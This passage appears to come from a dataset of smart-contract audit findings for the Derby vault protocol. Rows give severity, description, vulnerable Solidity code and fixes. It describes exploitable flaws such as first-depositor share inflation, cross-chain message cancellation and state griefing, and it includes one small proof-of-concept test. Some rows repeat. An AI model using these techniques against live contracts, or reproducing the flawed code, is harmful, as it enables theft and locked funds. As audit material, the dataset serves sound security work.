Then you need to change check inside `addToTotalRewards` to this `if (currentRebalancingPeriod < lastRebalancingPeriod) return;` in order to allow accruing for same period.",Player looses all his rewards,"```\\n function addToTotalRewards(uint256 _basketId) internal onlyBasketOwner(_basketId) {\\n if (baskets[_basketId].nrOfAllocatedTokens == 0) return;\\n\\n\\n uint256 vaultNum = baskets[_basketId].vaultNumber;\\n uint256 currentRebalancingPeriod = vaults[vaultNum].rebalancingPeriod;\\n uint256 lastRebalancingPeriod = baskets[_basketId].lastRebalancingPeriod;\\n\\n\\n if (currentRebalancingPeriod <= lastRebalancingPeriod) return;\\n\\n\\n for (uint k = 0; k < chainIds.length; k++) {\\n uint32 chain = chainIds[k];\\n uint256 latestProtocol = latestProtocolId[chain];\\n for (uint i = 0; i < latestProtocol; i++) {\\n int256 allocation = basketAllocationInProtocol(_basketId, chain, i) / 1E18;\\n if (allocation == 0) continue;\\n\\n\\n int256 lastRebalanceReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n lastRebalancingPeriod,\\n i\\n );\\n int256 currentReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n currentRebalancingPeriod,\\n i\\n );\\n baskets[_basketId].totalUnRedeemedRewards +=\\n (currentReward - lastRebalanceReward) *\\n allocation;\\n }\\n }\\n }\\n```\\n" +Vault.blacklistProtocol can revert in emergency,medium,"Vault.blacklistProtocol can revert in emergency, because it tries to withdraw underlying balance from protocol, which can revert for many reasons after it's hacked or paused.\\n```\\n function blacklistProtocol(uint256 _protocolNum) external onlyGuardian {\\n uint256 balanceProtocol = balanceUnderlying(_protocolNum);\\n currentAllocations[_protocolNum] = 0;\\n controller.setProtocolBlacklist(vaultNumber, _protocolNum);\\n savedTotalUnderlying -= balanceProtocol;\\n withdrawFromProtocol(_protocolNum, balanceProtocol);\\n }\\n```\\n\\nThe problem is that this function is trying to withdraw all balance from protocol. 
This can create problems: in case of a hack, an attacker can steal funds, pause the protocol, or do other things that can make the `withdrawFromProtocol` function revert. Because of that it will not be possible to add the protocol to the blacklist and, as a result, the system will stop working correctly.","Provide a `needToWithdraw` param to the `blacklistProtocol` function. In case it's safe to withdraw, then withdraw; otherwise, just set the protocol as blacklisted. Also you can call the function with the `true` param again, once it's safe to withdraw. Example of a hack situation flow: 1.underlying vault is hacked 2.you call setProtocolBlacklist(""vault"", false) which blacklists the vault 3.in the next tx you call setProtocolBlacklist(""vault"", true) and try to withdraw",Hacked or paused protocol can't be set to blacklist.,"```\\n function blacklistProtocol(uint256 _protocolNum) external onlyGuardian {\\n uint256 balanceProtocol = balanceUnderlying(_protocolNum);\\n currentAllocations[_protocolNum] = 0;\\n controller.setProtocolBlacklist(vaultNumber, _protocolNum);\\n savedTotalUnderlying -= balanceProtocol;\\n withdrawFromProtocol(_protocolNum, balanceProtocol);\\n }\\n```\\n" +The protocol could not handle multiple vaults correctly,medium,"The protocol needs to handle multiple vaults correctly. 
If there are three vaults (e.g.USDC, USDT, DAI) the protocol needs to rebalance them all without any problems\\nThe protocol needs to invoke pushAllocationsToController() every `rebalanceInterval` to push totalDeltaAllocations from Game to xChainController.\\n`pushAllocationsToController()` invoke `rebalanceNeeded()` to check if a rebalance is needed based on the set interval and it uses the state variable `lastTimeStamp` to do the calculations\\n```\\n function rebalanceNeeded() public view returns (bool) {\\n return (block.timestamp - lastTimeStamp) > rebalanceInterval || msg.sender == guardian;\\n }\\n```\\n\\nBut in the first invoking (for USDC vault) of `pushAllocationsToController()` it will update the state variable `lastTimeStamp` to the current `block.timestamp`\\n```\\nlastTimeStamp = block.timestamp;\\n```\\n\\nNow when you invoke (for DAI vault) `pushAllocationsToController()`. It will revert because of\\n```\\nrequire(rebalanceNeeded(), ""No rebalance needed"");\\n```\\n\\nSo if the protocol has two vaults or more (USDC, USDT, DAI) you can only do one rebalance every `rebalanceInterval`",Keep tracking the `lastTimeStamp` for every `_vaultNumber` by using an array,The protocol could not handle multiple vaults correctly\\nBoth Users and Game players will lose funds because the MainVault will not rebalance the protocols at the right time with the right values,```\\n function rebalanceNeeded() public view returns (bool) {\\n return (block.timestamp - lastTimeStamp) > rebalanceInterval || msg.sender == guardian;\\n }\\n```\\n +"User should not receive rewards for the rebalance period, when protocol was blacklisted, because of unpredicted behaviour of protocol price",medium,"User should not receive rewards for the rebalance period, when protocol was blacklisted, because of unpredicted behaviour of protocol price.\\nWhen user allocates derby tokens to some underlying protocol, he receive rewards according to the exchange price of that protocols token. 
This reward can be positive or negative. Rewards of protocol are set to `Game` contract inside `settleRewards` function and they are accumulated for user, once he calls `rebalanceBasket`.\\n```\\n function storePriceAndRewards(uint256 _totalUnderlying, uint256 _protocolId) internal {\\n uint256 currentPrice = price(_protocolId);\\n if (lastPrices[_protocolId] == 0) {\\n lastPrices[_protocolId] = currentPrice;\\n return;\\n }\\n\\n\\n int256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n int256 nominator = (int256(_totalUnderlying * performanceFee) * priceDiff);\\n int256 totalAllocatedTokensRounded = totalAllocatedTokens / 1E18;\\n int256 denominator = totalAllocatedTokensRounded * int256(lastPrices[_protocolId]) * 100; // * 100 cause perfFee is in percentages\\n\\n\\n if (totalAllocatedTokensRounded == 0) {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = 0;\\n } else {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = nominator / denominator;\\n }\\n\\n\\n lastPrices[_protocolId] = currentPrice;\\n }\\n```\\n\\nEvery time, previous price of protocol is compared with current price.\\nIn case if some protocol is hacked, there is `Vault.blacklistProtocol` function, that should withdraw reserves from protocol and mark it as blacklisted. The problem is that because of the hack it's not possible to determine what will happen with exhange rate of protocol. It can be 0, ot it can be very small or it can be high for any reasons. But protocol still accrues rewards per token for protocol, even that it is blacklisted. Because of that, user that allocated to that protocol can face with accruing very big negative or positive rewards. Both this cases are bad.\\nSo i believe that in case if protocol is blacklisted, it's better to set rewards as 0 for it.\\nExample. 1.User allocated 100 derby tokens for protocol A 2.Before `Vault.rebalance` call, protocol A was hacked which made it exchangeRate to be not real. 
3.Derby team has blacklisted that protocol A. 4.Vault.rebalance is called which used new(incorrect) exchangeRate of protocol A in order to calculate `rewardPerLockedToken` 5.When user calls rebalance basket next time, his rewards are accumulated with extremely high/low value.","In case if protocol is blacklisted, then set `rewardPerLockedToken` to 0 inside `storePriceAndRewards` function.",User's rewards calculation is unpredictable.,"```\\n function storePriceAndRewards(uint256 _totalUnderlying, uint256 _protocolId) internal {\\n uint256 currentPrice = price(_protocolId);\\n if (lastPrices[_protocolId] == 0) {\\n lastPrices[_protocolId] = currentPrice;\\n return;\\n }\\n\\n\\n int256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n int256 nominator = (int256(_totalUnderlying * performanceFee) * priceDiff);\\n int256 totalAllocatedTokensRounded = totalAllocatedTokens / 1E18;\\n int256 denominator = totalAllocatedTokensRounded * int256(lastPrices[_protocolId]) * 100; // * 100 cause perfFee is in percentages\\n\\n\\n if (totalAllocatedTokensRounded == 0) {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = 0;\\n } else {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = nominator / denominator;\\n }\\n\\n\\n lastPrices[_protocolId] = currentPrice;\\n }\\n```\\n" +Malicious users could set allocations to a blacklist Protocol and break the rebalancing logic,medium,"`game.sol` pushes `deltaAllocations` to vaults by pushAllocationsToVaults() and it deletes all the value of the `deltas`\\n```\\nvaults[_vaultNumber].deltaAllocationProtocol[_chainId][i] = 0;\\n```\\n\\nMalicious users could set allocations to a blacklist Protocol. 
If only one of the `Baskets` has a non-zero value to a Protocol on blacklist receiveProtocolAllocations() will revert `receiveProtocolAllocations().receiveProtocolAllocationsInt().setDeltaAllocationsInt()`\\n```\\n function setDeltaAllocationsInt(uint256 _protocolNum, int256 _allocation) internal {\\n require(!controller.getProtocolBlacklist(vaultNumber, _protocolNum), ""Protocol on blacklist"");\\n deltaAllocations[_protocolNum] += _allocation;\\n deltaAllocatedTokens += _allocation;\\n }\\n```\\n\\nand You won't be able to execute rebalance()",Issue Malicious users could set allocations to a blacklist Protocol and break the rebalancing logic\\nYou should check if the Protocol on the blacklist when Game players `rebalanceBasket()`,The guardian isn't able to restart the protocol manually. `game.sol` loses the value of the `deltas`. The whole system is down.,```\\nvaults[_vaultNumber].deltaAllocationProtocol[_chainId][i] = 0;\\n```\\n +inflate initial share price by initial depositor,medium,"initial deposit can be front-runned by non-whitelist address to inflate share price evading the `training` block, then all users after the first (the attacker) will receive no shares in return for their deposit.\\n`training` block inside `deposit` function intended to be set as true right after deployment. 
This `training` variable is to make sure the early depositor address is in the whitelist, thus negating any malicious behaviour (especially the first initial depositor)\\n```\\nFile: MainVault.sol\\n function deposit(\\n uint256 _amount,\\n address _receiver\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 shares) {\\n if (training) {\\n require(whitelist[msg.sender]);\\n uint256 balanceSender = (balanceOf(msg.sender) * exchangeRate) / (10 ** decimals());\\n require(_amount + balanceSender <= maxTrainingDeposit);\\n }\\n```\\n\\nFirst initial depositor issue is pretty well-known issue in vault share-based token minting for initial deposit which is susceptible to manipulation. This issue arise when the initial vault balance is 0, and initial depositor (attacker) can manipulate this share accounting by donating small amount, thus inflate the share price of his deposit. There are a lot of findings about this initial depositor share issue.\\nEven though the `training` block is (probably) written to mitigate this initial deposit, but since the execution of setting the `training` to be true is not in one transaction, then it's possible to be front-runned by attacker. 
Then this is again, will make the initial deposit susceptible to attack.\\nThe attack vector and impact is the same as TOB-YEARN-003, where users may not receive shares in exchange for their deposits if the total asset amount has been manipulated through a large “donation”.\\nThe initial exchangeRate is a fixed value set on constructor which is not related to totalSupply, but later it will use this totalSupply\\n```\\nFile: MainVault.sol\\n exchangeRate = _uScale;\\n// rest of code\\n function setXChainAllocationInt(\\n uint256 _amountToSend,\\n uint256 _exchangeRate,\\n bool _receivingFunds\\n ) internal {\\n amountToSendXChain = _amountToSend;\\n exchangeRate = _exchangeRate;\\n\\n if (_amountToSend == 0 && !_receivingFunds) settleReservedFunds();\\n else if (_amountToSend == 0 && _receivingFunds) state = State.WaitingForFunds;\\n else state = State.SendingFundsXChain;\\n }\\n\\nFile: XChainController.sol\\n uint256 totalUnderlying = getTotalUnderlyingVault(_vaultNumber) - totalWithdrawalRequests;\\n uint256 totalSupply = getTotalSupply(_vaultNumber);\\n\\n uint256 decimals = xProvider.getDecimals(vault);\\n uint256 newExchangeRate = (totalUnderlying * (10 ** decimals)) / totalSupply;\\n```\\n","The simplest way around for this is just set the initial `training` to be `true` either in the variable definition or set it in constructor, so the initial depositor will be from the whitelist.\\nor, more common solution for this issue is, require a minimum size for the first deposit and burn a portion of the initial shares (or transfer it to a secure address)","initial depositor can inflate share price, other user (next depositor) can lost their asset","```\\nFile: MainVault.sol\\n function deposit(\\n uint256 _amount,\\n address _receiver\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 shares) {\\n if (training) {\\n require(whitelist[msg.sender]);\\n uint256 balanceSender = (balanceOf(msg.sender) * exchangeRate) / (10 ** decimals());\\n require(_amount + 
balanceSender <= maxTrainingDeposit);\\n }\\n```\\n" +Wrong calculation of `balanceBefore` and `balanceAfter` in deposit method,medium,"Deposit method calculate net amount transferred from user. It use `reservedFunds` also in consideration when calculating `balanceBefore` and `balanceAfter` but it is not actually require.\\n```\\n uint256 balanceBefore = getVaultBalance() - reservedFunds;\\n vaultCurrency.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 balanceAfter = getVaultBalance() - reservedFunds;\\n uint256 amount = balanceAfter - balanceBefore;\\n```\\n\\nDeposit may fail when `reservedFunds` is greater than `getVaultBalance()`","Issue Wrong calculation of `balanceBefore` and `balanceAfter` in deposit method\\nUse below code. This is correct way of finding net amount transfer by depositor\\n```\\n uint256 balanceBefore = getVaultBalance();\\n vaultCurrency.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 balanceAfter = getVaultBalance();\\n uint256 amount = balanceAfter - balanceBefore;\\n```\\n",Deposit may fail when `reservedFunds` is greater than `getVaultBalance()`,"```\\n uint256 balanceBefore = getVaultBalance() - reservedFunds;\\n vaultCurrency.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 balanceAfter = getVaultBalance() - reservedFunds;\\n uint256 amount = balanceAfter - balanceBefore;\\n```\\n" +Vault could `rebalance()` before funds arrive from xChainController,medium,"Invoke sendFundsToVault() to Push funds from xChainController to vaults. 
which is call xTransferToVaults()\\nFor the cross-chain rebalancing `xTransferToVaults()` will execute this logic\\n```\\n // rest of code\\n pushFeedbackToVault(_chainId, _vault, _relayerFee);\\n xTransfer(_asset, _amount, _vault, _chainId, _slippage, _relayerFee);\\n // rest of code\\n```\\n\\n`pushFeedbackToVault()` Is to invoke receiveFunds() `pushFeedbackToVault()` always travel through the slow path\\n`xTransfer()` to transfer funds from one chain to another If fast liquidity is not available, the `xTransfer()` will go through the slow path.\\nThe vulnerability is if the `xcall()` of `pushFeedbackToVault()` excited successfully before `xTransfer()` transfer the funds to the vault, anyone can invoke rebalance() this will lead to rebalancing Vaults with Imperfect funds (this could be true only if funds that are expected to be received from XChainController are greater than `reservedFunds` and `liquidityPerc` together )\\nThe above scenario could be done in two possible cases 1- `xTransfer()` will go through the slow path but because High Slippage the cross-chain message will wait until slippage conditions improve (relayers will continuously re-attempt the transfer execution).\\n2- Connext Team says\\n```\\nAll messages are added to a Merkle root which is sent across chains every 30 mins\\nAnd then those messages are executed by off-chain actors called routers\\n\\nso it is indeed possible that messages are received out of order (and potentially with increased latency in between due to batch times) \\nFor ""fast path"" (unauthenticated) messages, latency is not a concern, but ordering may still be (this is an artifact of the chain itself too btw)\\none thing you can do is add a nonce to your messages so that you can yourself order them at destination\\n```\\n\\nso `pushFeedbackToVault()` and `xTransfer()` could be added to a different Merkle root and this will lead to executing `receiveFunds()` before funds arrive.",Check if funds are arrived or not,"The vault 
could `rebalance()` before funds arrive from xChainController, this will reduce rewards","```\\n // rest of code\\n pushFeedbackToVault(_chainId, _vault, _relayerFee);\\n xTransfer(_asset, _amount, _vault, _chainId, _slippage, _relayerFee);\\n // rest of code\\n```\\n" +`XChainController::sendFundsToVault` can be griefed and leave `XChainController` in a bad state,medium,"A user can grief the send funds to vault state transition during by calling `sendFundsToVault` multiple times with the same vault.\\nDuring rebalancing, some vaults might need funds sent to them. They will be in state `WaitingForFunds`. To transition from here any user can trigger `XChainController` to send them funds by calling `sendFundsToVault`.\\nThis is trigger per chain and will transfer funds from `XChainController` to the respective vaults on each chain.\\nAt the end, when the vaults on each chain are processed and either have gotten funds sent to them or didn't need to `sendFundsToVaults` will trigger the state for this `vaultNumber` to be reset.\\nHowever, when transferring funds, there's never any check that this chain has not already been processed. 
So any user could simply call this function for a vault that either has no funds to transfer or where there's enough funds in `XChainController` and trigger the state reset for the vault.\\nPoC in `xChaincontroller.test.ts`, run after 4.5) Trigger vaults to transfer funds to xChainController:\\n```\\n it('5) Grief xChainController send funds to vaults', async function () {\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n\\n expect(await xChainController.getFundsReceivedState(vaultNumber)).to.be.equal(0);\\n\\n expect(await vault3.state()).to.be.equal(3);\\n\\n // can't trigger state change anymore\\n await expect(xChainController.sendFundsToVault(vaultNumber, slippage, 1000, relayerFee, {value: parseEther('0.1'),})).to.be.revertedWith('Not all funds received');\\n });\\n```\\n","I recommend the protocol either keeps track of which vaults have been sent funds in `XChainController`.\\nor changes so a vault can only receive funds when waiting for them:\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol b/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol\\nindex 8739e24..d475ee6 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol\\n@@ // Remove the line below\\n328,7 // Add the 
line below\\n328,7 @@ contract MainVault is Vault, VaultToken {\\n /// @notice Step 5 end; Push funds from xChainController to vaults\\n /// @notice Receiving feedback from xController when funds are received, so the vault can rebalance\\n function receiveFunds() external onlyXProvider {\\n// Remove the line below\\n if (state != State.WaitingForFunds) return;\\n// Add the line below\\n require(state == State.WaitingForFunds,stateError);\\n settleReservedFunds();\\n }\\n \\n```\\n",XChainController ends up out of sync with the vault(s) that were supposed to receive funds.\\n`guardian` can resolve this by resetting the states using admin functions but these functions can still be frontrun by a malicious user.\\nUntil this is resolved the rebalancing of the impacted vaults cannot continue.,"```\\n it('5) Grief xChainController send funds to vaults', async function () {\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n\\n expect(await xChainController.getFundsReceivedState(vaultNumber)).to.be.equal(0);\\n\\n expect(await vault3.state()).to.be.equal(3);\\n\\n // can't trigger state change anymore\\n await expect(xChainController.sendFundsToVault(vaultNumber, slippage, 1000, relayerFee, {value: parseEther('0.1'),})).to.be.revertedWith('Not all funds received');\\n });\\n```\\n" +Protocol is will not work on most of the supported blockchains due to hardcoded WETH contract address.,medium,"The WETH address is hardcoded in the `Swap` library.\\nAs stated in the README.md, the protocol will be deployed on the following EVM blockchains - Ethereum Mainnet, Arbitrum, Optimism, Polygon, Binance Smart Chain. 
While the project has integration tests with an Ethereum mainnet RPC, they don't catch that, on different chains like for example Polygon, several functionalities will not actually work because of the hardcoded WETH address in the Swap.sol library:\\n```\\naddress internal constant WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;\\n```\\n",The WETH variable should be immutable in the Vault contract instead of a constant in the Swap library and the Wrapped Native Token contract address should be passed in the Vault constructor on each separate deployment.,Protocol will not work on most of the supported blockchains.,```\\naddress internal constant WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;\\n```\\n +"Rebalancing can be indefinitely blocked due to ever-increasing `totalWithdrawalRequests`, causing locking of funds in vaults",medium,"Rebalancing can get stuck indefinitely at the `pushVaultAmounts` step due to an error in the accounting of `totalWithdrawalRequests`. As a result, funds will be locked in vaults since requested withdrawals are only executed after a next successful rebalance.\\nFunds deposited to underlying protocols can only be withdrawn from vaults after a next successful rebalance:\\na depositor has to make a withdrawal request first, which is tracked in the current rebalance period;\\nrequested funds can be withdrawn in the next rebalance period.\\nThus, it's critical that rebalancing doesn't get stuck during one of its stages.\\nDuring rebalancing, vaults report their balances to `XChainController` via the pushTotalUnderlyingToController function: the function sends the current unlocked (i.e. excluding reserved funds) underlying token balance of the vault and the total amount of withdrawal requests in the current period. 
The latter amount is stored in the `totalWithdrawalRequests` storage variable:\\nthe variable is increased when a new withdrawal request is made;\\nand it's set to 0 after the vault has been rebalanced-it's value is added to the reserved funds.\\nThe logic of `totalWithdrawalRequests` is that it tracks only the requested withdrawal amounts in the current period-this amount becomes reserved during rebalancing and is added to `reservedFunds` after the vault has been rebalanced.\\nWhen `XChainController` receives underlying balances and withdrawal requests from vaults, it tracks them internally. The amounts then used to calculate how much tokens a vault needs to send or receive after a rebalancing: the total withdrawal amount is subtracted from vault's underlying balance so that it's excluded from the amounts that will be sent to the protocols and so that it could then be added to the reserved funds of the vault.\\nHowever, `totalWithdrawalRequests` in `XChainController` is not reset between rebalancings: when a new rebalancing starts, `XChainController` receives allocations from the Game and calls `resetVaultUnderlying`, which resets the underlying balances receive from vaults in the previous rebalancing. `resetVaultUnderlying` doesn't set `totalWithdrawalRequests` to 0:\\n```\\nfunction resetVaultUnderlying(uint256 _vaultNumber) internal {\\n vaults[_vaultNumber].totalUnderlying = 0;\\n vaultStage[_vaultNumber].underlyingReceived = 0;\\n vaults[_vaultNumber].totalSupply = 0;\\n}\\n```\\n\\nThis cause the value of `totalWithdrawalRequests` to accumulate over time. 
At some point, the total historical amount of all withdrawal requests (which `totalWithdrawalRequests` actually tracks) will be greater than the underlying balance of a vault, and this line will revert due to an underflow in the subtraction:\\n```\\nuint256 totalUnderlying = getTotalUnderlyingVault(_vaultNumber) - totalWithdrawalRequests;\\n```\\n","In `XChainController.resetVaultUnderlying`, consider setting `vaults[_vaultNumber].totalWithdrawalRequests` to 0. `totalWithdrawalRequests`, like its `MainVault.totalWithdrawalRequests` counterpart, tracks withdrawal requests only in the current period and should be reset to 0 between rebalancings.","Due to accumulation of withdrawal request amounts in the `totalWithdrawalRequests` variable, `XChainController.pushVaultAmounts` can be blocked indefinitely after the value of `totalWithdrawalRequests` has grown bigger than the value of `totalUnderlying` of a vault. Since withdrawals from vaults are delayed and only enabled in a next rebalancing period, depositors may not be able to withdraw their funds from vaults due to a blocked rebalancing.\\nWhile `XChainController` implements a bunch of functions restricted to the guardian that allow the guardian to push a rebalancing through, neither of these functions resets the value of `totalWithdrawalRequests`. 
If `totalWithdrawalRequests` becomes bigger than `totalUnderlying`, the guardian won't be able to fix the state of `XChainController` and push the rebalancing through.",```\\nfunction resetVaultUnderlying(uint256 _vaultNumber) internal {\\n vaults[_vaultNumber].totalUnderlying = 0;\\n vaultStage[_vaultNumber].underlyingReceived = 0;\\n vaults[_vaultNumber].totalSupply = 0;\\n}\\n```\\n +Wrong type casting leads to unsigned integer underflow exception when current price is < last price,medium,"When the current price of a locked token is lower than the last price, the Vault.storePriceAndRewards will revert because of the wrong integer casting.\\nThe following line appears in Vault.storePriceAndRewards:\\n```\\nint256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n```\\n\\nIf lastPrices[_protocolId] is higher than the currentPrice, the solidity compiler will revert due the underflow of subtracting unsigned integers because it will first try to calculate the result of `currentPrice - lastPrices[_protocolId]` and then try to cast it to int256.",Casting should be performed in the following way to avoid underflow and to allow the priceDiff being negative:\\n```\\nint256 priceDiff = int256(currentPrice) - int256(lastPrices[_protocolId]));\\n```\\n,The rebalance will fail when the current token price is less than the last one stored.,```\\nint256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n```\\n +withdrawal request override,medium,"It is possible that a withdrawal request is overridden during the initial phase.\\nUsers have two options to withdraw: directly or request a withdrawal if not enough funds are available at the moment.\\nWhen making a `withdrawalRequest` it is required that the user has `withdrawalRequestPeriod` not set:\\n```\\n function withdrawalRequest(\\n uint256 _amount\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 value) {\\n UserInfo storage user = userInfo[msg.sender];\\n 
require(user.withdrawalRequestPeriod == 0, ""Already a request"");\\n\\n value = (_amount * exchangeRate) / (10 ** decimals());\\n\\n _burn(msg.sender, _amount);\\n\\n user.withdrawalAllowance = value;\\n user.withdrawalRequestPeriod = rebalancingPeriod;\\n totalWithdrawalRequests += value;\\n }\\n```\\n\\nThis will misbehave during the initial period when `rebalancingPeriod` is 0. The check will pass, so if invoked multiple times, it will burn users' shares and overwrite the value.","Require `rebalancingPeriod` != 0 in `withdrawalRequest`, otherwise, force users to directly withdraw.","While not very likely to happen, the impact would be huge, because the users who invoke this function several times before the first rebalance, would burn their shares and lose previous `withdrawalAllowance`. The protocol should prevent such mistakes.","```\\n function withdrawalRequest(\\n uint256 _amount\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 value) {\\n UserInfo storage user = userInfo[msg.sender];\\n require(user.withdrawalRequestPeriod == 0, ""Already a request"");\\n\\n value = (_amount * exchangeRate) / (10 ** decimals());\\n\\n _burn(msg.sender, _amount);\\n\\n user.withdrawalAllowance = value;\\n user.withdrawalRequestPeriod = rebalancingPeriod;\\n totalWithdrawalRequests += value;\\n }\\n```\\n" +Anyone can execute certain functions that use cross chain messages and potentially cancel them with potential loss of funds.,high,"Certain functions that route messages cross chain on the `Game` and `MainVault` contract are unprotected (anyone can call them under the required state of the vaults). The way the cross chain messaging is implemented in the XProvider makes use of Connext's `xcall()` and sets the `msg.sender` as the `delegate` and `msg.value` as `relayerFee`. 
There are two possible attack vectors with this:\\nEither an attacker can call the function and set the msg.value to low so it won't be relayed until someone bumps the fee (Connext allows anyone to bump the fee). This however means special action must be taken to bump the fee in such a case.\\nOr the attacker can call the function (which irreversibly changes the state of the contract) and as the delegate of the `xcall` cancel the message. This functionality is however not yet active on Connext, but the moment it is the attacker will be able to change the state of the contract on the origin chain and make the cross chain message not execute on the destination chain leaving the contracts on the two chains out of synch with possible loss of funds as a result.\\nThe `XProvider` contract's `xsend()` function sets the `msg.sender` as the delegate and `msg.value` as `relayerFee`\\n```\\n uint256 relayerFee = _relayerFee != 0 ? _relayerFee : msg.value;\\n IConnext(connext).xcall{value: relayerFee}(\\n _destinationDomain, // _destination: Domain ID of the destination chain\\n target, // _to: address of the target contract\\n address(0), // _asset: use address zero for 0-value transfers\\n msg.sender, // _delegate: address that can revert or forceLocal on destination\\n 0, // _amount: 0 because no funds are being transferred\\n 0, // _slippage: can be anything between 0-10000 because no funds are being transferred\\n _callData // _callData: the encoded calldata to send\\n );\\n }\\n```\\n\\n`xTransfer()` using `msg.sender` as delegate:\\n```\\n IConnext(connext).xcall{value: (msg.value - _relayerFee)}(\\n _destinationDomain, // _destination: Domain ID of the destination chain\\n _recipient, // _to: address receiving the funds on the destination\\n _token, // _asset: address of the token contract\\n msg.sender, // _delegate: address that can revert or forceLocal on destination\\n _amount, // _amount: amount of tokens to transfer\\n _slippage, // _slippage: the maximum amount 
of slippage the user will accept in BPS (e.g. 30 = 0.3%)\\n bytes("""") // _callData: empty bytes because we're only sending funds\\n );\\n }\\n```\\n\\nConnext documentation explaining:\\n```\\nparams.delegate | (optional) Address allowed to cancel an xcall on destination.\\n```\\n\\nConnext documentation seems to indicate this functionality isn't active yet though it isn't clear whether that applies to the cancel itself or only the bridging back the funds to the origin chain.",Provide access control limits to the functions sending message across Connext so only the Guardian can call these functions with the correct msg.value and do not use msg.sender as a delegate but rather a configurable address like the Guardian.,"An attacker can call certain functions which leave the relying contracts on different chains in an unsynched state, with possible loss of funds as a result (mainly on XChainControleler's `sendFundsToVault()` when actual funds are transferred.","```\\n uint256 relayerFee = _relayerFee != 0 ? 
_relayerFee : msg.value;\\n IConnext(connext).xcall{value: relayerFee}(\\n _destinationDomain, // _destination: Domain ID of the destination chain\\n target, // _to: address of the target contract\\n address(0), // _asset: use address zero for 0-value transfers\\n msg.sender, // _delegate: address that can revert or forceLocal on destination\\n 0, // _amount: 0 because no funds are being transferred\\n 0, // _slippage: can be anything between 0-10000 because no funds are being transferred\\n _callData // _callData: the encoded calldata to send\\n );\\n }\\n```\\n" +Wrong type casting leads to unsigned integer underflow exception when current price is < last price,high,"When the current price of a locked token is lower than the last price, the Vault.storePriceAndRewards will revert because of the wrong integer casting.\\nThe following line appears in Vault.storePriceAndRewards:\\n```\\nint256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n```\\n\\nIf lastPrices[_protocolId] is higher than the currentPrice, the solidity compiler will revert due the underflow of subtracting unsigned integers because it will first try to calculate the result of `currentPrice - lastPrices[_protocolId]` and then try to cast it to int256.",Casting should be performed in the following way to avoid underflow and to allow the priceDiff being negative:\\n```\\nint256 priceDiff = int256(currentPrice) - int256(lastPrices[_protocolId]));\\n```\\n,The rebalance will fail when the current token price is less than the last one stored.,```\\nint256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n```\\n +Not all providers claim the rewards,high,"Providers wrongly assume that the protocols will no longer incentivize users with extra rewards.\\nAmong the current providers only the `CompoundProvider` claims the `COMP` incentives, others leave the claim function empty:\\n```\\n function claim(address _aToken, address _claimer) public override returns (bool) 
{}\\n```\\n",Adjust the providers to be ready to claim the rewards if necessary.,The implementations of the providers are based on the current situation. They are not flexible enough to support the rewards in case the incentives are back.,"```\\n function claim(address _aToken, address _claimer) public override returns (bool) {}\\n```\\n" +withdrawal request override,medium,"It is possible that a withdrawal request is overridden during the initial phase.\\nUsers have two options to withdraw: directly or request a withdrawal if not enough funds are available at the moment.\\nWhen making a `withdrawalRequest` it is required that the user has `withdrawalRequestPeriod` not set:\\n```\\n function withdrawalRequest(\\n uint256 _amount\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 value) {\\n UserInfo storage user = userInfo[msg.sender];\\n require(user.withdrawalRequestPeriod == 0, ""Already a request"");\\n\\n value = (_amount * exchangeRate) / (10 ** decimals());\\n\\n _burn(msg.sender, _amount);\\n\\n user.withdrawalAllowance = value;\\n user.withdrawalRequestPeriod = rebalancingPeriod;\\n totalWithdrawalRequests += value;\\n }\\n```\\n\\nThis will misbehave during the initial period when `rebalancingPeriod` is 0. The check will pass, so if invoked multiple times, it will burn users' shares and overwrite the value.","Require `rebalancingPeriod` != 0 in `withdrawalRequest`, otherwise, force users to directly withdraw.","While not very likely to happen, the impact would be huge, because the users who invoke this function several times before the first rebalance, would burn their shares and lose previous `withdrawalAllowance`. 
